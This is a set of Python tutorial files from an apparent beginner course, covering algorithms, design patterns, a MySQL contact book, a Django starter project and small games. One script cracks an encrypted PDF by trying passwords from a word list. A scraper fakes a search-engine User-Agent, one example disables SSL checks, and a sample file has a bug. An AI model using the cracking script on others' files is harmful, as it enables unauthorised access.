"""输入物品信息""" name_str, price_str, weight_str = input().split() return name_str, int(price_str), int(weight_str) def main(): """主函数""" max_weight, num_of_things = map(int, input().split()) all_things = [] for _ in range(num_of_things): all_things.append(Thing(*input_thing())) all_things.sort(key=lambda x: x.value, reverse=True) total_weight = 0 total_price = 0 for thing in all_things: if total_weight + thing.weight <= max_weight: print(f'小偷拿走了{thing.name}') total_weight += thing.weight total_price += thing.price print(f'总价值: {total_price}美元') if __name__ == '__main__': main() File: Day16-20/code/example10.py """ 装饰类的装饰器 - 单例模式 - 一个类只能创建出唯一的对象 上下文语法: __enter__ / __exit__ """ import threading from functools import wraps def singleton(cls): """单例装饰器""" instances = {} lock = threading.Lock() @wraps(cls) def wrapper(*args, **kwargs): if cls not in instances: with lock: if cls not in instances: instances[cls] = cls(*args, **kwargs) return instances[cls] return wrapper @singleton class President(): def __init__(self, name, country): self.name = name self.country = country def __str__(self): return f'{self.country}: {self.name}' def main(): print(President.__name__) p1 = President('特朗普', '美国') p2 = President('奥巴马', '美国') print(p1 == p2) print(p1) print(p2) if __name__ == '__main__': main() File: Day16-20/code/example24.py """ aiohttp - 异步HTTP网络访问 异步I/O(异步编程)- 只使用一个线程(单线程)来处理用户请求 用户请求一旦被接纳,剩下的都是I/O操作,通过多路I/O复用也可以达到并发的效果 这种做法与多线程相比可以让CPU利用率更高,因为没有线程切换的开销 Redis/Node.js - 单线程 + 异步I/O Celery - 将要执行的耗时间的任务异步化处理 异步I/O事件循环 - uvloop """ import asyncio import re import aiohttp async def fetch(session, url): async with session.get(url, ssl=False) as resp: return await resp.text() async def main(): pattern = re.compile(r'\<title\>(?P<title>.*)\<\/title\>') urls = ('https://www.python.org/', 'https://git-scm.com/', 'https://www.jd.com/', 'https://www.taobao.com/', 'https://www.douban.com/') async with aiohttp.ClientSession() as session: for url in urls: html = await fetch(session, url) print(pattern.search(html).group('title')) if __name__ == '__main__': loop = asyncio.get_event_loop() loop.run_until_complete(main()) loop.close() File: Day16-20/code/test_example02.py from unittest import TestCase from example02 import select_sort, merge class TestExample02(TestCase): """测试排序函数的测试用例""" def setUp(self): self.data1 = [35, 97, 12, 68, 55, 73, 81, 40] self.items1 = [12, 35, 68, 97] self.items2 = [40, 55, 73, 81] def test_merge(self): items = merge(self.items1, self.items2) for i in range(len(items) - 1): self.assertLessEqual(items[i], items[i + 1]) def test_select_sort(self): """测试顺序查找""" items = select_sort(self.data1) for i in range(len(items) - 1): self.assertLessEqual(items[i], items[i + 1]) File: Day36-45/code/contact/main.py """ -- 创建名为address的数据库 create database address default charset utf8; -- 切换到address数据库 use address; -- 创建联系人表tb_contacter create table tb_contacter ( conid int auto_increment comment '编号', conname varchar(31) not null comment '姓名', contel varchar(15) default '' comment '电话', conemail varchar(255) default'' comment '邮箱', primary key (conid) ); """ import pymysql INSERT_CONTACTER = """ insert into tb_contacter (conname, contel, conemail) values (%s, %s, %s) """ DELETE_CONTACTER = """ delete from tb_contacter where conid=%s """ UPDATE_CONTACTER = """ update tb_contacter set conname=%s, contel=%s, conemail=%s where conid=%s """ SELECT_CONTACTERS = """ select conid as id, conname as name, contel as tel, conemail as email from tb_contacter limit %s offset %s """ SELECT_CONTACTERS_BY_NAME = """ select conid as id, conname as name, contel as tel, conemail as email from tb_contacter where conname like %s """ COUNT_CONTACTERS = """ select count(conid) as total from tb_contacter """ class Contacter(object): def __init__(self, id, name, tel, email): self.id = id self.name = name self.tel = tel self.email = email def input_contacter_info(): name = input('姓名: ') tel = input('手机: ') email = input('邮箱: ') return name, tel, email def add_new_contacter(con): name, tel, email = input_contacter_info() try: with con.cursor() as cursor: if cursor.execute(INSERT_CONTACTER, (name, tel, email)) == 1: print('添加联系人成功!') except pymysql.MySQLError as err: print(err) print('添加联系人失败!') def delete_contacter(con, contacter): try: with con.cursor() as cursor: if cursor.execute(DELETE_CONTACTER, (contacter.id, )) == 1: print('联系人已经删除!') except pymysql.MySQLError as err: print(err) print('删除联系人失败!') def edit_contacter_info(con, contacter): name, tel, email = input_contacter_info() contacter.name = name or contacter.name contacter.tel = tel or contacter.tel contacter.email = email or contacter.email try: with con.cursor() as cursor: if cursor.execute(UPDATE_CONTACTER, (contacter.name, contacter.tel, contacter.email, contacter.id)) == 1: print('联系人信息已经更新!') except pymysql.MySQLError as err: print(err) print('更新联系人信息失败!') def show_contacter_detail(con, contacter): print('姓名:', contacter.name) print('手机号:', contacter.tel) print('邮箱:', contacter.email) choice = input('是否编辑联系人信息?(yes|no)') if choice == 'yes': edit_contacter_info(con, contacter) else: choice = input('是否删除联系人信息?(yes|no)') if choice == 'yes': delete_contacter(con, contacter) def show_search_result(con, cursor): contacters_list = [] for index, row in enumerate(cursor.fetchall()): contacter = Contacter(**row) contacters_list.append(contacter) print('[%d]: %s' % (index, contacter.name)) if len(contacters_list) > 0: choice = input('是否查看联系人详情?(yes|no)') if choice.lower() == 'yes': index = int(input('请输入编号: ')) if 0 <= index < cursor.rowcount: show_contacter_detail(con, contacters_list[index]) def find_all_contacters(con): page, size = 1, 5 try: with con.cursor() as cursor: cursor.execute(COUNT_CONTACTERS) total = cursor.fetchone()['total'] while True: cursor.execute(SELECT_CONTACTERS, (size, (page - 1) * size)) show_search_result(con, cursor) if page * size < total: choice = input('继续查看下一页?(yes|no)') if choice.lower() == 'yes': page += 1 else: break else: print('没有下一页记录!') break except pymysql.MySQLError as err: print(err) def find_contacters_by_name(con): name = input('联系人姓名: ') try: with con.cursor() as cursor: cursor.execute(SELECT_CONTACTERS_BY_NAME, ('%' + name + '%', )) show_search_result(con, cursor) except pymysql.MySQLError as err: print(err) def find_contacters(con): while True: print('1. 查看所有联系人') print('2. 搜索联系人') print('3. 退出查找') choice = int(input('请输入: ')) if choice == 1: find_all_contacters(con) elif choice == 2: find_contacters_by_name(con) elif choice == 3: break def main(): con = pymysql.connect(host='1.2.3.4', port=3306, user='yourname', passwd='yourpass', db='address', charset='utf8', autocommit=True, cursorclass=pymysql.cursors.DictCursor) while True: print('=====通讯录=====') print('1. 新建联系人') print('2. 查找联系人') print('3. 退出系统') print('===============') choice = int(input('请选择: ')) if choice == 1: add_new_contacter(con) elif choice == 2: find_contacters(con) elif choice == 3: con.close() print('谢谢使用, 再见!') break if __name__ == '__main__': main() File: Day46-60/code/hellodjango/manage.py #!/usr/bin/env python """Django's command-line utility for administrative tasks.""" import os import sys def main(): os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'hellodjango.settings') try: from django.core.management import execute_from_command_line except ImportError as exc: raise ImportError( "Couldn't import Django. Are you sure it's installed and " "available on your PYTHONPATH environment variable? Did you " "forget to activate a virtual environment?" ) from exc execute_from_command_line(sys.argv) if __name__ == '__main__': main() File: Day46-60/code/hellodjango/first/models.py from django.db import models # Create your models here. File: Day46-60/code/hellodjango/first/__init__.py File: Day46-60/code/hellodjango/first/apps.py from django.apps import AppConfig class FirstConfig(AppConfig): name = 'first' File: Day46-60/code/hellodjango/first/admin.py from django.contrib import admin # Register your models here. File: Day46-60/code/hellodjango/first/tests.py from django.test import TestCase # Create your tests here. File: Day46-60/code/hellodjango/first/views.py from random import sample from django.shortcuts import render def show_index(request): fruits = [ 'Apple', 'Orange', 'Pitaya', 'Durian', 'Waxberry', 'Blueberry', 'Grape', 'Peach', 'Pear', 'Banana', 'Watermelon', 'Mango' ] return render(request, 'index.html', {'fruits': sample(fruits, 3)}) File: Day46-60/code/hellodjango/first/migrations/__init__.py File: Day46-60/code/hellodjango/hellodjango/__init__.py File: Day46-60/code/hellodjango/hellodjango/settings.py """ Django settings for hellodjango project. Generated by 'django-admin startproject' using Django 2.2.13. For more information on this file, see https://docs.djangoproject.com/en/2.2/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/2.2/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'x)q$(0m0^ttqii@^zn^9bdbh&%l$)wzjm=nv&_y+^y9e!37=-z' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'hellodjango.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [os.path.join(BASE_DIR, 'templates')], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'hellodjango.wsgi.application' # Database # https://docs.djangoproject.com/en/2.2/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/2.2/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/2.2/howto/static-files/ STATIC_URL = '/static/' File: Day46-60/code/hellodjango/hellodjango/urls.py """hellodjango URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/2.2/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.contrib import admin from django.urls import path from first.views import show_index urlpatterns = [ path('admin/', admin.site.urls), path('hello/', show_index), ] File: Day46-60/code/hellodjango/hellodjango/wsgi.py """ WSGI config for hellodjango project. It exposes the WSGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/ """ import os from django.core.wsgi import get_wsgi_application os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'hellodjango.settings') application = get_wsgi_application() File: 番外篇/code/test03.py from random import randint, sample # 初始化备选红色球 red_balls = [x for x in range(1, 34)] # 选出六个红色球 selected_balls = sample(red_balls, 6) # 对红色球进行排序 selected_balls.sort() # 添加一个蓝色球 selected_balls.append(randint(1, 16)) # 输出选中的随机号码 for index, ball in enumerate(selected_balls): print('%02d' % ball, end=' ') if index == len(selected_balls) - 2: print('|', end=' ') print() File: 番外篇/code/test02.py print(sum(range(1, 101))) File: 番外篇/code/test.py def merge(items1, items2): items3 = [] index1, index2 = 0, 0 while index1 < len(items) and index2 < len(items2): if items[index1] < items2[index2]: items3.append(items1[index1]) index1 += 1 else: items3.append(items2[index2]) index2 += 1 File: 番外篇/code/test01.py print('hello, world!') File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example03.py a, b = 0, 1 for num in range(1, 101): a, b = b, a + b print(f'{num}: {a}') File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example02.py nums = [] for i in range(100000): nums.insert(0, i) print(nums) File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example06.py import re import PyPDF2 with open('Python_Tricks_encrypted.pdf', 'rb') as pdf_file_stream: reader = PyPDF2.PdfFileReader(pdf_file_stream) with open('dictionary.txt', 'r') as txt_file_stream: file_iter = iter(lambda: txt_file_stream.readline(), '') for word in file_iter: word = re.sub(r'\s', '', word) if reader.decrypt(word): print(word) break File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example01.py nums = [] for i in range(100000): nums.append(i) nums.reverse() print(nums) File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example05.py """ 公鸡5元一只,母鸡3元一只,小鸡1元三只,用100元买一百只鸡,问公鸡、母鸡、小鸡各有多少只? """ for x in range(21): for y in range(34): z = 100 - x - y if z % 3 == 0 and 5 * x + 3 * y + z // 3 == 100: print(x, y, z) File: 公开课/文档/第05次公开课-算法入门系列1-周而复始/code/example04.py from functools import lru_cache @lru_cache() def fib(num): if num in (1, 2): return 1 return fib(num - 1) + fib(num - 2) for num in range(1, 101): print(f'{num}: {fib(num)}') File: 公开课/文档/第04次公开课-好玩的Python/code/example01.py from PIL import Image, ImageFilter chiling = Image.open('resources/chiling.jpg') width, height = chiling.size chiling.show() chiling.transpose(Image.FLIP_LEFT_RIGHT).show() chiling.filter(ImageFilter.GaussianBlur(4)).show() chiling.filter(ImageFilter.EMBOSS).show() chiling.thumbnail((width // 4, height // 4)) chiling.show() File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example09.py import copy class PrototypeMeta(type): def __init__(cls, *args, **kwargs): super().__init__(*args, **kwargs) cls.clone = lambda self, is_deep=True: \ copy.deepcopy(self) if is_deep else copy.copy(self) class Student(metaclass=PrototypeMeta): pass stu1 = Student() stu2 = stu1.clone() print(stu1 == stu2) print(id(stu1), id(stu2)) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example08.py from functools import wraps from threading import RLock def singleton(cls): instances = {} lock = RLock() @wraps(cls) def wrapper(*args, **kwargs): if cls not in instances: with lock: if cls not in instances: instances[cls] = cls(*args, **kwargs) return instances[cls] @singleton class President: pass President = President.__wrapped__ File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example07.py from functools import lru_cache @lru_cache() def fib(num): if num in (1, 2): return 1 return fib(num - 1) + fib(num - 2) for n in range(1, 121): print(f'{n}: {fib(n)}') File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example03.py values = [True] * 10 print(values) numbers = [x for x in range(1, 11)] print(numbers) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example02.py print(sum(range(1, 101))) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example06.py # 一行代码实现求阶乘函数 fac = lambda x: __import__('functools').reduce(int.__mul__, range(1, x + 1), 1) print(fac(5)) # 一行代码实现求最大公约数函数 gcd = lambda x, y: y % x and gcd(y % x, x) or x print(gcd(15, 27)) # 一行代码实现判断素数的函数 is_prime = lambda x: x > 1 and not [f for f in range(2, int(x ** 0.5) + 1) if x % f == 0] for num in range(2, 100): if is_prime(num): print(num, end=' ') print() # 一行代码实现快速排序 quick_sort = lambda items: len(items) and quick_sort([x for x in items[1:] if x < items[0]]) \ + [items[0]] + quick_sort([x for x in items[1:] if x > items[0]]) \ or items items = [57, 12, 35, 68, 99, 81, 70, 22] print(quick_sort(items)) # 生成FizzBuzz列表 # 1 2 Fizz 4 Buzz 6 ... 14 ... FizzBuzz 16 ... 100 print(['Fizz'[x % 3 * 4:] + 'Buzz'[x % 5 * 4:] or x for x in range(1, 101)]) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example01.py print('hello, world') File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example05.py from http.server import HTTPServer, SimpleHTTPRequestHandler class RequestHandler(SimpleHTTPRequestHandler): def do_GET(self): self.send_response(200) self.end_headers() self.wfile.write('<h1>goodbye, world</h1>'.encode()) server = HTTPServer(('', 8000), RequestHandler) server.serve_forever() File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example04.py from random import randint, sample def generate(): """生成一组随机号码""" red_balls = [x for x in range(1, 34)] selected_balls = sample(red_balls, 6) selected_balls.sort() selected_balls.append(randint(1, 16)) return selected_balls def display(balls): """输出一组双色球号码""" for index, ball in enumerate(balls): print(f'{ball:0>2d}', end=' ') if index == len(balls) - 2: print('|', end=' ') print() num = int(input('机选几注: ')) for _ in range(num): display(generate()) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part01/example10.py import random import time import requests from bs4 import BeautifulSoup for page in range(10): resp = requests.get( url=f'https://movie.douban.com/top250?start={25 * page}', headers={'User-Agent': 'BaiduSpider'} ) soup = BeautifulSoup(resp.text, "lxml") for elem in soup.select('a > span.title:nth-child(1)'): print(elem.text) time.sleep(random.random() * 5) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom04.py fruits = ['orange', 'grape', 'pitaya', 'blueberry'] # index = 0 # for fruit in fruits: # print(index, ':', fruit) # index += 1 for index, fruit in enumerate(fruits): print(index, ':', fruit) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom05.py data = [7, 20, 3, 15, 11] # result = [] # for i in data: # if i > 10: # result.append(i * 3) result = [num * 3 for num in data if num > 10] print(result) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom01.py name = 'jackfrued' fruits = ['apple', 'orange', 'grape'] owners = {'name': '骆昊', 'age': 40, 'gender': True} # if name != '' and len(fruits) > 0 and len(owners.keys()) > 0: # print('Jackfrued love fruits.') if name and fruits and owners: print('Jackfrued love fruits.') File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom06.py data = {'x': '5'} # if 'x' in data and isinstance(data['x'], (str, int, float)) \ # and data['x'].isdigit(): # value = int(data['x']) # print(value) # else: # value = None try: value = int(data['x']) print(value) except (KeyError, TypeError, ValueError): value = None File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom02.py a, b = 5, 10 # temp = a # a = b # b = a a, b = b, a print(f'a = {a}, b = {b}') File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part02/idiom03.py chars = ['j', 'a', 'c', 'k', 'f', 'r', 'u', 'e', 'd'] # name = '' # for char in chars: # name += char name = ''.join(chars) print(name) File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part04/example.py import cProfile # @profile def is_prime(num): for factor in range(2, int(num ** 0.5) + 1): if num % factor == 0: return False return True class PrimeIter: def __init__(self, total): self.counter = 0 self.current = 1 self.total = total def __iter__(self): return self def __next__(self): if self.counter < self.total: self.current += 1 while not is_prime(self.current): self.current += 1 self.counter += 1 return self.current raise StopIteration() @profile def eat_memory(): items = [] for _ in range(1000000): items.append(object()) return items def main(): eat_memory() # list(PrimeIter(1000)) # cProfile.run('list(PrimeIter(10000))') if __name__ == '__main__': main() File: 公开课/文档/年薪50W+的Python程序员如何写代码/code/Python/opencourse/part03/example.py """ 扑克 """ import enum import random @enum.unique class Suite(enum.Enum): """花色(枚举)""" SPADE, HEART, CLUB, DIAMOND = range(4) class Card: """牌""" def __init__(self, suite, face): self.suite = suite self.face = face def __repr__(self): suites = '♠♥♣♦' faces = ['', 'A', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'J', 'Q', 'K'] return f'{suites[self.suite.value]}{faces[self.face]}' class Poker: """扑克""" def __init__(self): self.cards = [Card(suite, face) for suite in Suite for face in range(1, 14)] self.current = 0 def shuffle(self): """洗牌""" self.current = 0 random.shuffle(self.cards) def deal(self): """发牌""" card = self.cards[self.current] self.current += 1 return card @property def has_next(self): """还有没有牌可以发""" return self.current < len(self.cards) def main(): """主函数(程序入口)""" poker = Poker() poker.shuffle() print(poker.cards) if __name__ == '__main__': main() File: 公开课/文档/第06次公开课-算法入门系列2-在水一方/code/example03.py """ 迷宫寻路 """ import random import sys WALL = -1 ROAD = 0 ROWS = 10 COLS = 10 def find_way(maze, i=0, j=0, step=1): """走迷宫""" if 0 <= i < ROWS and 0 <= j < COLS and maze[i][j] == 0: maze[i][j] = step if i == ROWS - 1 and j == COLS - 1: print('=' * 20) display(maze) sys.exit(0) find_way(maze, i + 1, j, step + 1) find_way(maze, i, j + 1, step + 1) find_way(maze, i - 1, j, step + 1) find_way(maze, i, j - 1, step + 1) maze[i][j] = ROAD def reset(maze): """重置迷宫""" for i in range(ROWS): for j in range(COLS): num = random.randint(1, 10) maze[i][j] = WALL if num > 7 else ROAD maze[0][0] = maze[ROWS - 1][COLS - 1] = ROAD def display(maze): """显示迷宫""" for row in maze: for col in row: if col == -1: print('■', end=' ') elif col == 0: print('□', end=' ') else: print(f'{col}'.ljust(2), end='') print() def main(): """主函数""" maze = [[0] * COLS for _ in range(ROWS)] reset(maze) display(maze) find_way(maze) print('没有出路!!!') if __name__ == '__main__': main() File: 公开课/文档/第06次公开课-算法入门系列2-在水一方/code/example02.py def climb(num): a, b, c = 1, 2, 4 for _ in range(num - 1): a, b, c = b, c, a + b + c return a def main(): n = int(input('台阶数量: ')) print(climb(n)) if __name__ == '__main__': main() File: 公开课/文档/第06次公开课-算法入门系列2-在水一方/code/example01.py import sys def fac(num): if num == 0: return 1 return num * fac(num - 1) def main(): print(fac(59996)) if __name__ == '__main__': sys.setrecursionlimit(60000) main() # for i in range(1000): # print(f'{i}:'.rjust(3), fac(i)) File: 公开课/文档/第06次公开课-算法入门系列2-在水一方/code/example05.py size = 25 for i in range(size): for j in range(size): if i % 2 == 1 or j % 2 == 1: print('■', end='') else: print('□', end='') print() File: 公开课/文档/第06次公开课-算法入门系列2-在水一方/code/example04.py """ 骑士巡逻 """ import sys SIZE = 8 def display(board): """显示棋盘""" for row in board: for col in row: print(f'{col}'.rjust(2, '0'), end=' ') print() def patrol(board, i=0, j=0, step=1): """巡逻""" if 0 <= i < SIZE and 0 <= j < SIZE and board[i][j] == 0: board[i][j] = step if step == SIZE * SIZE: display(board) sys.exit(0) patrol(board, i + 1, j + 2, step + 1) patrol(board, i + 2, j + 1, step + 1) patrol(board, i + 2, j - 1, step + 1) patrol(board, i + 1, j - 2, step + 1) patrol(board, i - 1, j - 2, step + 1) patrol(board, i - 2, j - 1, step + 1) patrol(board, i - 2, j + 1, step + 1) patrol(board, i - 1, j + 2, step + 1) board[i][j] = 0 def main(): """主函数""" board = [[0] * SIZE for _ in range(SIZE)] patrol(board) if __name__ == '__main__': main() File: Day01-15/code/Day07/lottery.py """ 双色球随机选号程序 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ from random import randrange, randint, sample def display(balls): """ 输出列表中的双色球号码 """ for index, ball in enumerate(balls): if index == len(balls) - 1: print('|', end=' ') print('%02d' % ball, end=' ') print() def random_select(): """ 随机选择一组号码 """ red_balls = [x for x in range(1, 34)] selected_balls = [] for _ in range(6): index = randrange(len(red_balls)) selected_balls.append(red_balls[index]) del red_balls[index] # 上面的for循环也可以写成下面这行代码 # sample函数是random模块下的函数 # selected_balls = sample(red_balls, 6) selected_balls.sort() selected_balls.append(randint(1, 16)) return selected_balls def main(): n = int(input('机选几注: ')) for _ in range(n): display(random_select()) if __name__ == '__main__': main() File: Day01-15/code/Day07/marquee.py """ 输入学生考试成绩计算平均分 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ import os import time def main(): str = 'Welcome to 1000 Phone Chengdu Campus ' while True: print(str) time.sleep(0.2) str = str[1:] + str[0:1] # for Windows use os.system('cls') instead os.system('clear') if __name__ == '__main__': main() File: Day01-15/code/Day07/tuple.py """ 元组的定义和使用 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): # 定义元组 t = ('骆昊', 38, True, '四川成都') print(t) # 获取元组中的元素 print(t[0]) print(t[1]) print(t[2]) print(t[3]) # 遍历元组中的值 for member in t: print(member) # 重新给元组赋值 # t[0] = '王大锤' # TypeError # 变量t重新引用了新的元组 原来的元组被垃圾回收 t = ('王大锤', 20, True, '云南昆明') print(t) # 元组和列表的转换 person = list(t) print(person) person[0] = '李小龙' person[1] = 25 print(person) fruits_list = ['apple', 'banana', 'orange'] fruits_tuple = tuple(fruits_list) print(fruits_tuple) print(fruits_tuple[1]) if __name__ == '__main__': main() File: Day01-15/code/Day07/list3.py """ 生成列表 - 用range创建数字列表 - 生成表达式 - 生成器 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ # 生成Fibonacci序列的生成器 def fib(n): a, b = 0, 1 for _ in range(n): a, b = b, a + b yield a def main(): # 用range创建数值列表 list1 = list(range(1, 11)) print(list1) # 生成表达式 list2 = [x * x for x in range(1, 11)] print(list2) list3 = [m + n for m in 'ABCDEFG' for n in '12345'] print(list3) print(len(list3)) # 生成器(节省空间但生成下一个元素时需要花费时间) gen = (m + n for m in 'ABCDEFG' for n in '12345') print(gen) for elem in gen: print(elem, end=' ') print() gen = fib(20) print(gen) for elem in gen: print(elem, end=' ') print() if __name__ == '__main__': main() File: Day01-15/code/Day07/tic-tac-toe.py """ 井字棋游戏 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ import os def print_board(board): print(board['TL'] + '|' + board['TM'] + '|' + board['TR']) print('-+-+-') print(board['ML'] + '|' + board['MM'] + '|' + board['MR']) print('-+-+-') print(board['BL'] + '|' + board['BM'] + '|' + board['BR']) def main(): init_board = { 'TL': ' ', 'TM': ' ', 'TR': ' ', 'ML': ' ', 'MM': ' ', 'MR': ' ', 'BL': ' ', 'BM': ' ', 'BR': ' ' } begin = True while begin: curr_board = init_board.copy() begin = False turn = 'x' counter = 0 os.system('clear') print_board(curr_board) while counter < 9: move = input('轮到%s走棋, 请输入位置: ' % turn) if curr_board[move] == ' ': counter += 1 curr_board[move] = turn if turn == 'x': turn = 'o' else: turn = 'x' os.system('clear') print_board(curr_board) choice = input('再玩一局?(yes|no)') begin = choice == 'yes' if __name__ == '__main__': main() File: Day01-15/code/Day07/avgscore.py """ 输入学生考试成绩计算平均分 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): number = int(input('请输入学生人数: ')) names = [None] * number scores = [None] * number for index in range(len(names)): names[index] = input('请输入第%d个学生的名字: ' % (index + 1)) scores[index] = float(input('请输入第%d个学生的成绩: ' % (index + 1))) total = 0 for index in range(len(names)): print('%s: %.1f分' % (names[index], scores[index])) total += scores[index] print('平均成绩是: %.1f分' % (total / number)) if __name__ == '__main__': main() File: Day01-15/code/Day07/dict1.py """ 定义和使用字典 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): scores = {'骆昊': 95, '白元芳': 78, '狄仁杰': 82} print(scores['骆昊']) print(scores['狄仁杰']) for elem in scores: print('%s\t--->\t%d' % (elem, scores[elem])) scores['白元芳'] = 65 scores['诸葛王朗'] = 71 scores.update(冷面=67, 方启鹤=85) print(scores) if '武则天' in scores: print(scores['武则天']) print(scores.get('武则天')) print(scores.get('武则天', 60)) print(scores.popitem()) print(scores.popitem()) print(scores.pop('骆昊', 100)) scores.clear() print(scores) if __name__ == '__main__': main() File: Day01-15/code/Day07/set1.py """ 定义和使用集合 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): set1 = {1, 2, 3, 3, 3, 2} print(set1) print('Length =', len(set1)) set2 = set(range(1, 10)) print(set2) set1.add(4) set1.add(5) set2.update([11, 12]) print(set1) print(set2) set2.discard(5) # remove的元素如果不存在会引发KeyError if 4 in set2: set2.remove(4) print(set2) # 遍历集合容器 for elem in set2: print(elem ** 2, end=' ') print() # 将元组转换成集合 set3 = set((1, 2, 3, 3, 2, 1)) print(set3.pop()) print(set3) if __name__ == '__main__': main() File: Day01-15/code/Day07/list2.py """ 列表常用操作 - 列表连接 - 获取长度 - 遍历列表 - 列表切片 - 列表排序 - 列表反转 - 查找元素 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): fruits = ['grape', 'apple', 'strawberry', 'waxberry'] fruits += ['pitaya', 'pear', 'mango'] # 循环遍历列表元素 for fruit in fruits: print(fruit.title(), end=' ') print() # 列表切片 fruits2 = fruits[1:4] print(fruits2) # fruit3 = fruits # 没有复制列表只创建了新的引用 fruits3 = fruits[:] print(fruits3) fruits4 = fruits[-3:-1] print(fruits4) fruits5 = fruits[::-1] print(fruits5) if __name__ == '__main__': main() File: Day01-15/code/Day07/set2.py """ 集合的常用操作 - 交集 - 并集 - 差集 - 子集 - 超集 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): set1 = set(range(1, 7)) print(set1) set2 = set(range(2, 11, 2)) print(set2) set3 = set(range(1, 5)) print(set1 & set2) # print(set1.intersection(set2)) print(set1 | set2) # print(set1.union(set2)) print(set1 - set2) # print(set1.difference(set2)) print(set1 ^ set2) # print(set1.symmetric_difference(set2)) print(set2 <= set1) # print(set2.issubset(set1)) print(set3 <= set1) # print(set3.issubset(set1)) print(set1 >= set2) # print(set1.issuperset(set2)) print(set1 >= set3) # print(set1.issuperset(set3)) if __name__ == '__main__': main() File: Day01-15/code/Day07/findmax.py """ 找出列表中最大或最小的元素 Version: 0.1 Author: 骆昊 Date: 2018-03-06 """ def main(): fruits = ['grape', 'apple', 'strawberry', 'waxberry', 'pitaya'] # 直接使用内置的max和min函数找出列表中最大和最小元素 # print(max(fruits)) # print(min(fruits)) max_value = min_value = fruits[0] for index in range(1, len(fruits)): if fruits[index] > max_value: max_value = fruits[index] elif fruits[index] < min_value: min_value = fruits[index] 